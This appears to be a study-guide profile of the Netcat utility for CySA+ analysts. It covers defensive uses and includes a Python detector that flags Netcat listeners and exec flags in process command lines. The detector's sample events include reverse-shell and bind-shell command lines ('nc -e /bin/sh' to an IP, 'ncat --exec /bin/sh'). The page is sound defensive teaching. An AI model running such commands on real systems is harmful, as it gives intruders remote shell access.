Netcat

Nmap Project / Hobbit

The "Swiss army knife" of TCP/IP — banner grabbing, port listening, file transfer, reverse shells.

Network Recon & Monitoring · Free & Open Source · CLI · Learning · Cross-platform

Cyber Kill Chain & Defender Lifecycle

Attacker — Kill Chain
1 Reconnaissance
2 Weaponization
3 Delivery
4 Exploitation
5 Installation
6 Command & Control
7 Actions on Objectives
Defender — IR Lifecycle
8 Detection / Monitoring
9 Containment & Eradication
10 Post-incident Forensics

Description

Netcat (nc) is a tiny utility that reads and writes data across network connections. Both attackers and defenders use it. A CySA+ analyst must recognise its presence on a host because Netcat is a classic indicator of compromise — frequently used for reverse shells, bind shells, port relays, and ad-hoc data exfiltration.

Common defensive uses: banner grabbing, quick port listeners for firewall testing, simple file transfers across DMZs.

Variants you may see on the exam: nc, ncat (from the Nmap project), socat, and the BSD and GNU implementations. The -e flag, which executes a program and attaches it to the connection, is often stripped on hardened distros, for good reason.

Use cases

  • Grabbing a service banner during triage
  • Spinning up a quick listener to validate ACLs
  • Recognising reverse-shell command-line patterns in EDR alerts
  • Transferring evidence files off a forensic VM in a controlled lab

Example

# Banner grab
nc -nv 10.10.10.5 22

# Listener that writes received data to a file (defender lab)
nc -lvnp 4444 > /tmp/incoming.bin
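
For the use case of recognising Netcat command-line patterns in EDR alerts, here is an added example (not part of the original page) that tags process command lines by whether Netcat is present, listening, or started with an exec flag. The sample events, finding labels and function names are constructed for illustration, and the list of value-taking short options is an approximation across Netcat builds.

```python
import shlex
from pathlib import PurePosixPath

# Binary names treated as Netcat (assumption: POSIX-style process paths).
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# Short options that consume a value in common builds (approximate list).
VALUE_OPTS = set("egGiopqswT")
# ncat long options that attach a program to the socket.
EXEC_LONG = {"--exec", "--sh-exec"}

def classify(cmdline):
    """Return sorted findings for one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in telemetry
        argv = cmdline.split()
    if not argv or PurePosixPath(argv[0]).name.lower() not in NETCAT_NAMES:
        return []
    findings = {"netcat-present"}
    for arg in argv[1:]:
        if arg.startswith("--"):
            opt = arg.split("=", 1)[0]
            if opt in EXEC_LONG:
                findings.add("exec-flag")
            elif opt == "--listen":
                findings.add("listener")
        elif arg.startswith("-"):
            for ch in arg[1:]:  # clustered short options, e.g. -lvnp
                if ch == "l":
                    findings.add("listener")
                elif ch == "e":  # -c is skipped: its meaning differs per build
                    findings.add("exec-flag")
                if ch in VALUE_OPTS:
                    break  # rest of the token is that option's value
    return sorted(findings)

# Constructed sample process events (not real telemetry).
SAMPLE_EVENTS = [
    "nc -nv 10.10.10.5 22",
    "nc -lvnp 4444",
    "/usr/bin/nc -e /bin/sh 192.0.2.10 4444",
    "ncat --listen 4444 --exec /bin/sh",
    "rsync -e ssh /data backup:/data",
]

def triage(events):
    """Map each Netcat command line to its findings; skip everything else."""
    return {e: f for e in events if (f := classify(e))}

if __name__ == "__main__":
    for cmd, tags in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(tags):42} {cmd}")
```

The rsync line shows why the binary name is checked before the flags: -e on its own is not a signal.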